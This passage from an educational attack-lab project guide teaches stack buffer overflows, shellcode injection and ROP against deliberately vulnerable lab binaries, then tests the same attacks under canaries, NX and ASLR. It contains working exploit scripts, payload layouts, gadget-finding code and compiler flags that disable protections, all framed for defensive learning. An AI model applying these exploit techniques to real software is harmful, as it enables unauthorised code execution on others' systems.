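    while (idx := code.find(needle, start)) != -1:
        hits.append(base + idx)
        start = idx + 1
    return hits

POP_RDI_RET = bytes.fromhex("5fc3")   # pop rdi ; ret

# Synthetic bytes standing in for a .text section; 0x401000 is a made-up base.
# The trailing 41 5f c3 is "pop r15; ret", which contains 5f c3 one byte in.
text = bytes.fromhex("554889e5" "5fc3" "90" "415fc3")

gadgets = find_byte_sequence(text, POP_RDI_RET, base=0x401000)
print([hex(a) for a in gadgets])      # ['0x401004', '0x401008']
```

The second hit is an unintended gadget: decoding pop r15; ret from its second byte yields pop rdi; ret, which is why binaries that never use pop rdi explicitly often still contain it.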

Checkpoint: Target 4/5 print "ROP chain successful!"

Phase 4: Mitigation Analysis (Days 15-18)

Goals:

  • Test attacks against each mitigation
  • Document failure modes
  • Understand defense layers

Tasks:

  1. Recompile targets with individual mitigations:
    # Stack canary only
    gcc -fstack-protector -z execstack -no-pie -o target_canary target.c
    
    # NX only
    gcc -fno-stack-protector -z noexecstack -no-pie -o target_nx target.c
    
    # ASLR (system-wide)
    echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
    
    # Full protection
    gcc -fstack-protector-all -z noexecstack -fPIE -pie -Wl,-z,relro,-z,now -o target_full target.c
    
  2. Test each exploit against each mitigation

  3. Document:
    • Which attacks succeed/fail
    • Error messages and crash behavior
    • Theoretical bypass techniques (don't necessarily implement)
  4. Write summary analysis

Checkpoint: Journal documents all mitigation effects

Phase 5: Documentation and Polish (Days 19-21)

Goals:

  • Complete all journal entries
  • Ensure reproducibility
  • Clean up code and tools

Tasks:

  1. Review and complete all journal entries
  2. Verify all exploits still work from scratch
  3. Add setup instructions to README
  4. Create presentation-ready summary
  5. Consider extensions (if time permits)

Final Checkpoint: Another person can replicate your attacks using your documentation


6. Testing Strategy

6.1 Test Categories

| Category | Purpose | Examples |
|----------|---------|----------|
| Exploit Verification | Confirm attack works | Script runs, target behaves as expected |
| Offset Validation | Confirm calculations | Pattern crash at expected offset |
| Shellcode Testing | Verify code executes | Standalone shellcode test |
| Mitigation Testing | Confirm protection effect | Attack fails with specific mitigation |

6.2 Critical Tests

Test 1: Offset Calculation Validation

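from pwn import *

def find_offset(binary_path):
    """Use a cyclic pattern to find the exact offset to the return address."""
    pattern = cyclic(200, n=8)          # 8-byte windows for x86-64
    p = process(binary_path)
    p.sendline(pattern)
    p.wait()

    # A non-canonical return address faults on `ret`, so RIP still points at
    # the ret instruction and the pattern bytes sit at the top of the stack.
    core = p.corefile                   # requires core dumps to be enabled
    return cyclic_find(core.read(core.rsp, 8), n=8)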

Test 2: Shellcode Integrity

# Verify no null bytes (if required); prints the number of 0x00 bytes
xxd -p -c1 shellcode.bin | grep -c '^00$'

# Verify length
wc -c < shellcode.bin

# Test execution
./test_shellcode

Test 3: ROP Gadget Validity

# Verify gadget at address
gdb ./target4
(gdb) x/3i 0x401234
# Should show: pop rdi; ret

Test 4: Mitigation Effect

# Compile with canary
gcc -fstack-protector -o target_canary target.c

# Run exploit (should fail)
./target_canary < payload
# Expected: *** stack smashing detected ***

# Verify in dmesg
dmesg | tail

6.3 Reproducibility Checklist

  • All exploits work from fresh environment
  • ASLR state documented for each test
  • Compiler flags recorded exactly
  • Kernel version noted
  • GDB commands provided for verification
  • Expected output documented
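Several checklist items can be captured automatically at the top of each journal entry. The sketch below gathers kernel version, machine type, and ASLR state into a dictionary; the function name, the field names, and the flags string passed in are illustrative assumptions.

```python
import json
import platform
from pathlib import Path

def environment_record(compiler_flags: str) -> dict:
    """Collect the environment facts a reader needs to reproduce a run."""
    aslr = Path("/proc/sys/kernel/randomize_va_space")
    return {
        "kernel": platform.release(),
        "machine": platform.machine(),
        "aslr": aslr.read_text().strip() if aslr.exists() else "unknown",
        "compiler_flags": compiler_flags,
    }

record = environment_record("-g -fno-stack-protector -z execstack -no-pie")
print(json.dumps(record, indent=2))
```

Pasting this output next to the GDB evidence makes it clear which settings were in effect when an exploit succeeded or failed.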

7. Common Pitfalls and Debugging

7.1 Frequent Mistakes

| Pitfall | Symptom | Solution |
|---------|---------|----------|
| Wrong architecture | Shellcode crashes | Verify 32-bit vs 64-bit |
| ASLR still enabled | Addresses differ each run | Check /proc/sys/kernel/randomize_va_space |
| Canary mismatch | "Stack smashing detected" | Disable with -fno-stack-protector |
| Bad bytes in payload | Input truncated | Avoid null bytes, newlines |
| Wrong endianness | Addresses garbled | Use p64() for little-endian packing |
| Stack alignment | Crashes in library calls | Ensure 16-byte alignment |
| Missing gadgets | Can't build chain | Check linked libraries too |
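The endianness pitfall is easiest to see by packing one address both ways. The sketch below uses only the standard library; its p64 is a stand-in with the same intent as the pwntools helper of that name, and the address is the example win() address used earlier.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an unsigned 64-bit integer in little-endian byte order."""
    return struct.pack("<Q", value)

addr = 0x401156
little = p64(addr)
big = addr.to_bytes(8, "big")

print(little.hex())   # 5611400000000000
print(big.hex())      # 0000000000401156 (wrong order for x86-64)
```

On x86-64 the least significant byte comes first in memory, so the payload must carry 56 11 40 followed by zeros.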

7.2 Debugging Techniques

Memory inspection in GDB:

# Examine stack around buffer
(gdb) x/64xg $rsp

# Watch memory writes
(gdb) watch *(int*)0x7fffffffdc88

# Print registers at crash
(gdb) info registers

# Check memory permissions
(gdb) info proc mappings

Payload debugging:

from pwn import *

# Print payload bytes in hex
payload = b"AAAA" + p64(0x401234)
print(payload.hex())
print(hexdump(payload))

# Interactive debugging with pwntools
p = gdb.debug('./target', 'break vulnerable')
p.sendline(payload)
p.interactive()

Shellcode debugging:

# Single-step through shellcode
(gdb) break *0x7fffffffdc00
(gdb) si
(gdb) info registers

7.3 x86-64 Specific Issues

Stack alignment requirement:

x86-64 ABI requires 16-byte stack alignment before CALL
Solution: Add extra "ret" gadget to realign
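The effect of the extra ret can be worked out with modular arithmetic. At a normal function entry RSP % 16 == 8, because CALL has just pushed an 8-byte return address onto an aligned stack. The sketch below assumes the hijacked ret executes with RSP % 16 == 8 (true when the caller was aligned) and counts 8 bytes per chain slot; the names and the sample RSP value are hypothetical.

```python
def entry_rsp(rsp_at_ret: int, chain_slots: int) -> int:
    """RSP on entry to the final target: each consumed 8-byte slot adds 8."""
    return rsp_at_ret + 8 * chain_slots

def misaligned(rsp_at_entry: int) -> bool:
    """The ABI expects RSP % 16 == 8 at function entry."""
    return rsp_at_entry % 16 != 8

RSP_AT_RET = 0x7FFFFFFFE018      # hypothetical value with RSP % 16 == 8

direct = entry_rsp(RSP_AT_RET, chain_slots=1)   # chain: [target]
padded = entry_rsp(RSP_AT_RET, chain_slots=2)   # chain: [ret gadget, target]
print(misaligned(direct), misaligned(padded))   # True False
```

Under that assumption a chain needs an even number of slots up to and including the target address, which is why a five-slot chain such as pop rdi, value, pop rsi, value, target also benefits from one extra ret.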

Red zone:

128 bytes below RSP can be used without adjustment
Leaf functions may use this - shellcode must avoid

PIE complications:

With PIE, all addresses randomized including code
Need leak or partial overwrite to defeat

8. Extensions and Challenges

8.1 Beginner Extensions

  • Shellcode variations: Write shellcode for different syscalls
  • Alphanumeric encoding: Create shellcode using only printable characters
  • Format string auxiliary: Add format string vulnerability exploitation

8.2 Intermediate Extensions

  • ASLR bypass via brute force: Implement on 32-bit target
  • ret2plt attack: Attack without knowing libc base
  • Canary leak: Use format string to leak canary value
  • Heap overflow: Extend to heap-based attacks

8.3 Advanced Extensions

  • SROP (Sigreturn-Oriented Programming): Use sigreturn for powerful primitive
  • JIT-ROP: Discover gadgets at run time through repeated memory disclosure, defeating fine-grained ASLR
  • CFI bypass research: Study Control-Flow Integrity evasion
  • Write-What-Where primitives: Arbitrary memory write exploitation

8.4 CTF Practice

  • Complete CMU Attack Lab officially
  • Solve pwn challenges on picoCTF
  • Practice on pwnable.kr
  • Compete in a live CTF event

9. Real-World Connections

9.1 Historical Significance

| Year | Event | Impact |
|------|-------|--------|
| 1988 | Morris Worm | First major buffer overflow exploit |
| 1996 | "Smashing the Stack for Fun and Profit" | Aleph One's influential paper |
| 2001 | Code Red Worm | IIS buffer overflow |
| 2003 | SQL Slammer | One of the fastest-spreading worms on record |
| 2017 | EternalBlue (WannaCry) | SMB buffer overflow, billions in damage |
| 2021 | Log4Shell | JNDI injection in Log4j rather than a memory-safety bug; shows that unvalidated input remains critical |

9.2 Industry Relevance

Roles that use this knowledge:

  • Security Researcher
  • Penetration Tester
  • Vulnerability Analyst
  • Security Engineer (defensive)
  • Compiler/Runtime Developer
  • Operating System Developer

Companies actively hiring:

  • Security firms (CrowdStrike, Palo Alto, Mandiant)
  • Cloud providers (AWS, Google, Microsoft security teams)
  • Hardware vendors (Intel, AMD, ARM security teams)
  • Bug bounty platforms (HackerOne, Bugcrowd)

9.3 Modern Mitigations in Production

Linux kernel protections:
- KASLR (Kernel ASLR)
- SMEP (Supervisor Mode Execution Prevention)
- SMAP (Supervisor Mode Access Prevention)
- kASAN (Kernel Address Sanitizer)

Browser protections:
- Sandboxing (process isolation)
- Site isolation
- CFI (Control-Flow Integrity)
- Memory tagging (MTE on ARM)

Language-level:
- Rust memory safety
- Go bounds checking
- Swift automatic memory management

9.4 Secure Coding Takeaways

From this project, apply these practices:

  1. Avoid unbounded functions: replace strcpy, sprintf, gets with strncpy (plus explicit NUL termination), snprintf, fgets
  2. Validate all input lengths: Before copying, check destination size
  3. Enable all compiler protections: -fstack-protector-strong -pie -z relro -z now
  4. Use memory-safe languages when possible: Rust, Go for new code
  5. Defense in depth: Don't rely on a single mitigation
  6. Fuzz testing: Find overflows before attackers do
  7. Code review for patterns: Train to recognize vulnerable code

10. Resources

10.1 Essential Reading

Books:

  • Computer Systems: A Programmer's Perspective, 3e - Bryant & O'Hallaron (Chapter 3)
  • Hacking: The Art of Exploitation, 2nd Edition - Jon Erickson
  • The Shellcoder's Handbook - Chris Anley et al.
  • Practical Binary Analysis - Dennis Andriesse
  • A Bug Hunter's Diary - Tobias Klein

Papers:

  • "Smashing the Stack for Fun and Profit" - Aleph One (1996)
  • "The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls" - Shacham (2007)
  • "Hacking Blind" - Bittau et al. (2014), the paper that introduces Blind Return Oriented Programming (BROP)

10.2 Tools

| Tool | Purpose | Link |
|------|---------|------|
| pwntools | Exploit development framework | https://github.com/Gallopsled/pwntools |
| ROPgadget | Gadget finder | https://github.com/JonathanSalwan/ROPgadget |
| ropper | Advanced gadget finder | https://github.com/sashs/Ropper |
| Ghidra | Reverse engineering | https://ghidra-sre.org/ |
| radare2 | Binary analysis | https://rada.re/n/ |
| GEF/pwndbg | GDB enhancements | https://github.com/hugsy/gef |

10.3 Practice Platforms

  • CMU Attack Lab: Official CS:APP lab materials
  • picoCTF: Beginner-friendly CTF with pwn challenges
  • pwnable.kr: Progressive difficulty challenges
  • ROP Emporium: Pure ROP practice
  • Exploit Education: Phoenix, Protostar VMs

10.4 Video Resources

  • LiveOverflow YouTube channel (binary exploitation series)
  • John Hammond CTF walkthroughs
  • GynvaelEN low-level security streams

10.5 Related Projects

  • Prerequisites: P4 (Calling Convention), P5 (Bomb Lab)
  • Follow-up: P10 (ELF Link Map) for PLT/GOT understanding
  • Advanced: P17 (Capstone) applies security thinking to real system

11. Self-Assessment Checklist

Understanding

  • I can draw a stack frame and identify buffer, saved RBP, and return address locations
  • I can calculate exact offsets from buffer to return address
  • I can explain why strcpy is dangerous and what safer alternatives exist
  • I understand how shellcode executes on the stack (when NX is disabled)
  • I can explain what ROP is and why it bypasses NX protection
  • I can describe how each mitigation works (canaries, NX, ASLR, RELRO)
  • I understand limitations of each mitigation

Skills

  • I can find the offset from buffer to return address using GDB
  • I can write minimal shellcode for x86-64
  • I can find ROP gadgets in a binary using automated tools
  • I can construct a ROP chain to call a function with arguments
  • I can compile programs with specific mitigations enabled/disabled
  • I can use pwntools (or equivalent) for exploit development

Implementation

  • Completed at least 3 code injection attacks
  • Completed at least 2 ROP attacks
  • Documented all attacks with memory evidence
  • Tested attacks against each individual mitigation
  • Created reproducible exploit scripts

Ethical Understanding

  • I understand the legal boundaries of security research
  • I only practice in isolated, authorized environments
  • I recognize my responsibility to use this knowledge defensively
  • I can articulate the defensive value of understanding attacks

12. Submission / Completion Criteria

Minimum Viable Completion

  • Target 1 (basic overflow) exploited with documentation
  • Target 2 or 3 (code injection) exploited with documentation
  • Target 4 (basic ROP) exploited with documentation
  • Mitigation analysis for at least 2 protections
  • All work in isolated environment

Full Completion

  • All 5 targets exploited
  • Comprehensive mitigation analysis (canary, NX, ASLR, full)
  • All journal entries complete with memory evidence
  • Reproducible exploit scripts for all attacks
  • Clear documentation enabling reproduction

Excellence (Going Above and Beyond)

  • Implemented ASLR bypass technique
  • Explored advanced ROP (SROP, JOP)
  • Completed external CTF challenges (picoCTF, pwnable.kr)
  • Developed custom tooling for analysis
  • Created educational materials (blog post, video, presentation)

13. Real World Outcome

When you complete this project, your attack lab environment should look roughly like this (addresses, sizes, and timestamps will differ on your system):

$ cd attack-lab
$ ls -la
total 64
drwxr-xr-x  8 user  staff   256 Dec 18 16:30 .
drwxr-xr-x  5 user  staff   160 Dec 18 10:00 ..
drwxr-xr-x  4 user  staff   128 Dec 18 14:00 targets
drwxr-xr-x  6 user  staff   192 Dec 18 16:00 exploits
drwxr-xr-x  4 user  staff   128 Dec 18 16:20 tools
drwxr-xr-x  8 user  staff   256 Dec 18 16:30 journal
-rw-r--r--  1 user  staff  2048 Dec 18 16:30 README.md

$ cat exploits/exploit1.py
#!/usr/bin/env python3
import sys
from pwn import *

# Target 1: Basic Stack Smash
offset = 72
win_addr = 0x401156

payload = b"A" * offset
payload += p64(win_addr)

sys.stdout.buffer.write(payload)

$ python3 exploits/exploit1.py | ./targets/target1
You called win()! Attack successful.
Segmentation fault (core dumped)

$ ./targets/target2 < exploits/shellcode_payload.bin
PWNED

$ cat journal/attack1-basic-overflow.md
## Attack #1: Basic Stack Overflow

### Summary
- **Target**: target1 (basic overflow)
- **Vulnerability**: strcpy with no bounds checking
- **Technique**: Return address overwrite
- **Result**: Successfully redirected execution to win()

### Offset Calculation
Using GDB pattern matching:
- Buffer at: 0x7fffffffdc00
- Return address at: 0x7fffffffdc48
- Offset: 72 bytes (64 buffer + 8 saved RBP)

$ gdb ./targets/target4
(gdb) break vulnerable
(gdb) run < exploits/rop_payload.bin
Breakpoint 1, vulnerable () at target4.c:12
(gdb) x/32xg $rsp
0x7fffffffdc00: 0x4141414141414141  0x4141414141414141
...
0x7fffffffdc40: 0x4141414141414141  0x0000000000401234  <-- pop rdi gadget
0x7fffffffdc50: 0x00000000deadbeef  0x0000000000401236  <-- value for rdi, pop rsi
0x7fffffffdc60: 0x00000000cafebabe  0x0000000000401300  <-- value for rsi, win_with_args
(gdb) continue
ROP chain successful!
a = 0xdeadbeef, b = 0xcafebabe

$ perf stat -e branches,branch-misses ./targets/target_canary < exploits/exploit1_payload.bin
*** stack smashing detected ***: terminated

 Performance counter stats for './targets/target_canary':
         1,234,567      branches
            12,345      branch-misses   #    1.00% of all branches

14. The Core Question You're Answering

"How does memory corruption translate into arbitrary code execution, and what defense mechanisms exist to prevent this - and why are they sometimes insufficient?"

This question is fundamental to computer security. You're learning:

  • The exact mechanics of how writing past a buffer leads to control-flow hijacking
  • Why C's lack of bounds checking creates security vulnerabilities
  • How defenders and attackers have co-evolved (NX led to ROP, ASLR led to info leaks)
  • The principle that understanding attacks is essential to building defenses

15. Concepts You Must Understand First

Before starting this project, ensure you understand these concepts:

| Concept | Where to Learn | Why It's Needed |
|---------|----------------|-----------------|
| Stack Frame Layout | CS:APP 3.7 | Know where buffer, saved RBP, and return address are located |
| Calling Convention | CS:APP 3.7.2 | Understand how arguments are passed and returns work |
| x86-64 Instructions | CS:APP 3.4-3.5 | Read and write assembly for shellcode |
| Little-Endian Byte Order | CS:APP 2.1.3 | Pack addresses correctly in payloads |
| Virtual Memory Basics | CS:APP 9.1-9.3 | Understand why addresses matter and how ASLR works |
| Compilation Process | CS:APP 1.2 | Know how source becomes executable and what the linker does |
| System Calls | Linux man pages | Write shellcode that interacts with the OS |

16. Questions to Guide Your Design

As you develop each exploit, ask yourself:

  1. What is the vulnerability? Where exactly is the bounds check missing?
  2. What is the stack layout? How far from your buffer to the return address?
  3. What is my goal? Call a function? Execute shellcode? Chain gadgets?
  4. What constraints exist? Bad characters? Input length limits? Filtering?
  5. What mitigations are active? Is the stack executable? Is ASLR on? Canaries?
  6. How can I verify my payload? What GDB commands will show if it's correct?
  7. Why does this work? Can I explain every byte of my payload?
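
Question 4 can be checked mechanically before a payload ever reaches the target. The sketch below is a minimal illustration using only the Python standard library. `find_bad_bytes` is a hypothetical helper name, and the offset (72) and address (0x401156) are illustrative values, not values for your binary. It reports which payload positions hold a byte that the copying function would treat as a terminator: NUL for strcpy, newline for gets.

```python
import struct

def find_bad_bytes(payload, bad):
    """Return the offsets in payload whose byte value appears in bad."""
    return [i for i, b in enumerate(payload) if b in bad]

# Illustrative values only: 72 bytes of padding, then a 64-bit address.
payload = b"A" * 72 + struct.pack("<Q", 0x401156)

# strcpy stops copying at the first NUL byte.
nul_offsets = find_bad_bytes(payload, b"\x00")
# gets stops reading at a newline.
newline_offsets = find_bad_bytes(payload, b"\n")

print("NUL bytes at offsets:", nul_offsets)
print("newline bytes at offsets:", newline_offsets)
```

In this example the only NUL bytes are the upper bytes of the address at the very end of the payload. A strcpy-based copy would still deliver the three meaningful address bytes, which is enough when the upper bytes of the saved return address were already zero (typical for a non-PIE binary). A NUL anywhere earlier would truncate the payload.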

17. Thinking Exercise

Before you start coding, work through this exercise on paper:

Given this vulnerable function and stack layout:

void vulnerable(char *input) {
    char buffer[32];
    strcpy(buffer, input);
}

Stack (high addresses at top):
+---------------------------+  0x7fffffffdc48
|     Return Address        |  <- Target to overwrite
+---------------------------+  0x7fffffffdc40
|     Saved RBP             |
+---------------------------+  0x7fffffffdc38
|                           |
|     buffer[32]            |  <- Our input lands here
|                           |
+---------------------------+  0x7fffffffdc18
|     [local vars/padding]  |
+---------------------------+  0x7fffffffdc10 (RSP after prologue)

Questions to answer:

  1. If buffer starts at 0x7fffffffdc18, how many bytes must you write to reach the return address at 0x7fffffffdc40?
  2. If win() is at address 0x401156, write out the complete payload in hex bytes (little-endian).
  3. Why do we write 'A' characters before the target address? What are they doing?
  4. If we had a stack canary at 0x7fffffffdc38, what would happen when we try this attack?
  5. If NX is enabled, why can't we simply inject shellcode into the buffer and jump to it?

Expected answers:

  1. 0x7fffffffdc40 - 0x7fffffffdc18 = 0x28 = 40 bytes (32-byte buffer + 8-byte saved RBP, matching the diagram)
  2. 41 41 41 ... (40 bytes) ... 56 11 40 00 00 00 00 00 (return address in little-endian)
  3. The 'A's fill the buffer and saved RBP - they're padding to reach the return address
  4. The canary would be overwritten, and before returning, the function would detect this and call __stack_chk_fail, aborting the program
  5. The NX bit marks the stack as non-executable - the CPU will fault if we try to execute from stack addresses

18. The Interview Questions They'll Ask

After completing this project, you should be able to answer these interview questions:

  1. "Explain how a buffer overflow works and how it can lead to code execution."
    • Writing past buffer boundaries overwrites adjacent stack data
    • The return address is stored on the stack at a higher address than the local variables
    • By overwriting the return address, the attacker controls where execution goes after the function returns
    • If the attacker can inject code (shellcode) and point the return address at it, they achieve code execution
  2. "What is Return-Oriented Programming (ROP) and why is it needed?"
    • ROP chains together small instruction sequences (gadgets) ending in ret
    • Needed because NX/DEP prevents executing injected code
    • Reuses existing code in the binary/libraries
    • Each gadget performs a small operation; the chain achieves complex behavior
  3. "Explain stack canaries and their limitations."
    • Random value placed between buffer and return address
    • Checked before function returns; if modified, program aborts
    • Limitations: can be leaked via format string bugs, doesn't prevent non-sequential writes
  4. "How does ASLR work and what are its weaknesses?"
    • Randomizes base addresses of stack, heap, libraries, and (with PIE) executable
    • Weaknesses: information leaks reveal addresses, partial overwrites may work, brute force on 32-bit
  5. "What's the difference between code injection and code reuse attacks?"
    • Code injection: Attacker provides their own machine code, jumps to it (needs memory that is both writable and executable)
    • Code reuse: Attacker chains existing code (ROP, ret2libc), works despite NX
    • Code injection is simpler but blocked by modern systems; code reuse is more complex but bypasses NX
  6. "How would you write secure code to prevent buffer overflows?"
    • Use bounds-checked functions: strncpy (with explicit NUL termination), snprintf, fgets
    • Validate all input lengths before copying
    • Enable compiler protections: -fstack-protector-strong -pie -z relro -z now
    • Consider memory-safe languages for new code (Rust, Go)

19. Hints in Layers

If you get stuck, reveal hints one at a time. Try each level before moving to the next.

Hint 1 - Finding the Offset

Use a cyclic pattern (like pwntools' cyclic()) or write a recognizable sequence like "AAAABBBBCCCC...". When it crashes, examine what value is in the return address position - this tells you exactly where your overwrite lands.
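
The idea behind the pattern can be sketched without pwntools. This is a minimal standard-library illustration, not a replacement for pwntools' cyclic() and cyclic_find(). `make_pattern` and `find_offset` are hypothetical helper names, and the 72-byte offset is simulated rather than read from a real crash. The pattern uses upper/lower/digit triples (Aa0Aa1Aa2...), so every 8-byte window is unique.

```python
import string

def make_pattern(length):
    """Build a non-repeating pattern of the form Aa0Aa1Aa2... (upper, lower, digit)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("pattern length too large for this simple generator")

def find_offset(pattern, crashed_value):
    """Locate the 8 bytes seen in the return address slot, given as an integer."""
    needle = crashed_value.to_bytes(8, "little")
    return pattern.find(needle)

pattern = make_pattern(200)
# Simulate what a debugger would show if the return address sat 72 bytes in.
observed = int.from_bytes(pattern[72:80], "little")
print(hex(observed), "->", find_offset(pattern, observed))
```

On x86-64 the pattern bytes usually form a non-canonical address, so the fault tends to occur at the ret itself. In that case read the value from the top of the stack (x/gx $rsp) rather than from rip.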

Hint 2 - Constructing Payloads

Always use struct.pack("<Q", address) or pwntools' p64() to pack addresses. x86-64 is little-endian, so 0x401234 becomes \x34\x12\x40\x00\x00\x00\x00\x00 in memory.
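
The packing rule above can be verified with the standard library alone. In this minimal sketch, the local `p64` is a stand-in written for illustration (pwntools provides its own), and `OFFSET` and `TARGET` are assumed example values rather than values for any particular binary.

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

# The example from the hint: the low-order byte comes first in memory.
packed = p64(0x401234)
print(packed.hex(" "))

# Illustrative payload: padding up to the return address, then the target.
OFFSET = 72          # assumed distance from buffer start to return address
TARGET = 0x401156    # assumed address of the function to reach
payload = b"A" * OFFSET + p64(TARGET)

# Round-trip check: the last 8 bytes must decode back to the target address.
(recovered,) = struct.unpack("<Q", payload[OFFSET:OFFSET + 8])
print(len(payload), hex(recovered))
```

Unpacking the payload again is a cheap way to catch a wrong format string (for example ">Q" or "<I") before it costs a debugging session.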

Hint 3 - Debugging Exploits

Set breakpoints at the vulnerable function's ret instruction. When you hit it, examine the stack with x/8xg $rsp. The first value should be your target address. If not, your offset is wrong.

Hint 4 - ROP Chains

Start simple: find a pop rdi; ret gadget. Your stack should be: [gadget addr][value for rdi][next addr]. The ret after pop rdi will go to next addr with rdi set to your value.
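
The stack layout described above can be sketched as a list of 64-bit slots. This is a minimal illustration using only the standard library. `build_rop_payload` is a hypothetical helper, and every address and the 72-byte offset are placeholders that you would replace with values found in your own target using a gadget finder and GDB.

```python
import struct

def build_rop_payload(offset, chain):
    """Pad up to the return address, then lay out each 64-bit chain entry in order."""
    return b"A" * offset + b"".join(struct.pack("<Q", entry) for entry in chain)

# All addresses are illustrative placeholders; find real ones with a gadget tool.
POP_RDI_RET = 0x401234    # assumed address of: pop rdi; ret
POP_RSI_RET = 0x401236    # assumed address of: pop rsi; ret
WIN_WITH_ARGS = 0x401300  # assumed address of the two-argument target function

chain = [
    POP_RDI_RET, 0xdeadbeef,   # ret lands on the gadget, which pops this into rdi
    POP_RSI_RET, 0xcafebabe,   # the gadget's ret lands here, popping into rsi
    WIN_WITH_ARGS,             # final ret transfers to the function
]
payload = build_rop_payload(72, chain)

# Dump the chain as 8-byte stack slots, lowest address first.
for i in range(72, len(payload), 8):
    (slot,) = struct.unpack("<Q", payload[i:i + 8])
    print(f"+{i:3d}: {slot:#018x}")
```

Printing the slots in stack order makes it easy to compare the payload against what x/8xg $rsp shows at the ret instruction.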


20. Books That Will Help

| Topic | Book | Chapter/Section |
|-------|------|-----------------|
| Stack Layout and Calls | CS:APP 3e | Chapter 3, Section 3.7 |
| Buffer Overflow Basics | CS:APP 3e | Section 3.10.3-3.10.4 |
| Memory Layout | CS:APP 3e | Chapter 9 |
| Exploit Development | Hacking: Art of Exploitation | Chapters 2-3 |
| Shellcode Writing | The Shellcoder's Handbook | Chapters 1-5 |
| ROP Techniques | "The Geometry of Innocent Flesh on the Bone" | Shacham, 2007 paper |
| Modern Mitigations | Practical Binary Analysis | Chapter 10 |
| System V ABI | x86-64 psABI Document | Sections 3.2-3.4 |

This guide was expanded from CSAPP_3E_DEEP_LEARNING_PROJECTS.md. For the complete learning path, see the project index.

Remember: The goal is to become a better defender. Use this knowledge responsibly.